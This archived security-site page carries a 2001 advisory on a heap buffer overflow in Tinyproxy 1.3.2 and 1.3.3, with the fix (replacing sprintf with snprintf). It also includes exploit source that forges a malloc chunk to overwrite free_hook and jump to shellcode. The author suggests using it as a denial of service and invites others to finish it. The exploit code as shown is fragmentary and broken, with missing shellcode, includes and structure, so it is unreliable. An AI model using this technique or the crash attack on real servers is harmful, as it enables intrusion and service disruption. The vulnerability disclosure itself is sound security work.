[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Tinyproxy version 1.3.2 and 1.3.3 buffer overflow

Title: Tinyproxy version 1.3.2 and 1.3.3 buffer overflow
Released by: pkcrew.org
Date: 17th January 2001
Printable version: Click here
--- Packet Knights Advisory 002 ---



Author : |CyRaX| 

Application : Tinyproxy version 1.3.2 and 1.3.3

Type : heap buffer overflow

--- The Problem ---

Function http_err in utils.c :

int httperr(struct conn_s *connptr, int err, char *msg)


        char *outbuf;


        outbuf = xmalloc(BUFFER);

        sprintf(outbuf, premsg, err, msg, msg, err, msg, VERSION);

where BUFFER is defined 2048.

as you can see msg is copied 3 times into outbuf.. so we can overflow it.

We can write what we want in msg by putting something different from

"http://" in the connect request

bash-2.03# telnet 0 8888


Connected to 0.

Escape character is '^]'.

connect [lots of A]://

Connection closed by foreign host.

--- The solution ---

change the sprintf into snprintf:


(authors were contacted)

--- The exploitation ---

Exploiting this program is hard. The problem is that nothing is allocated

between the malloc of our buf and the bugged sprintf. To exploit we must

overwrite any structure after our buf.. but in many cases there's nothing

after it. For some values of the size of the buffer that we send the target

is not at the end.. so we can overwrite something. Those values changes in

dependence of which distribution you run. Unfortunately for redhat 7.0 and

slackware I wasn't unable to hit correctly the struct. For the values that

make segfault free() the chunk is not hitted by a string that we're able

to control. I don't have more time to dedicate to this xploit. I include it so

if someone got more time can try it on other distros.

Anyway.. you can always use it as a dos.. setting a large buffsize:

the sprintf will segfault trying to write out of the heap.

--- PKCtiny-ex.c ---


 * Exploit for tinyproxy 1.3.2 and 1.3.3

 * by |CyRaX| 

 * Packet Knights Crew - www.pkcrew.org


 * Greetz :

 *  bikappa: for some help

 *  all the pkc members expecially recidjvo, asynchro and cthulhu

 *  all the other friends





char jmps[]="\xeb\x0e";

char c0de[]="\xeb\x0e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"














void usage();

void usage(){

   printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX| \n");

   printf("Packet Knights Crew - http://www.pkcrew.org\n");

   printf("please.. READ the advisory first!\n");

   printf("Usage : ./PKCtiny-ex      \n");

   printf("buf_size is the size of the buf we send\n");

   printf("struct offset is the distance from the beginning of the buffer we send where we\n");

   printf("       we put the malloc chunk struct!\n");

   printf("free_hook is the address of the free_hook function pointer\n");

   printf("shellcode is the address of the shellcode (you don't neet to hit it correctly\n");

   printf("          you can just hope to it a jump\n");

   printf("\nfree_hook and shellcode must be given in 0xaddress format\n");



int main(int argc, char **argv){

   int s,i,err,pid[5];

   struct sockaddr_in dst;

   struct malloc_chunk{

      unsigned int ps;

      unsigned int sz;

      struct malloc_chunk *fd;

      struct malloc_chunk *bk;


   char *magic,*sndbuff;

   unsigned long FREE_HOOKZ,SHELLCODE;


   magic=(char *)malloc(atoi(argv[3])+1);

   sndbuff=(char *)malloc(atoi(argv[3])+30);







   mc.ps=0xffffffff & ~1;


   mc.fd=(struct malloc_chunk *)(SHELLCODE);

   mc.bk=(struct malloc_chunk *)(FREE_HOOKZ-8);


   connect(s,(struct sockaddr *)&dst,sizeof(dst));



(C) 1999-2000 All rights reserved.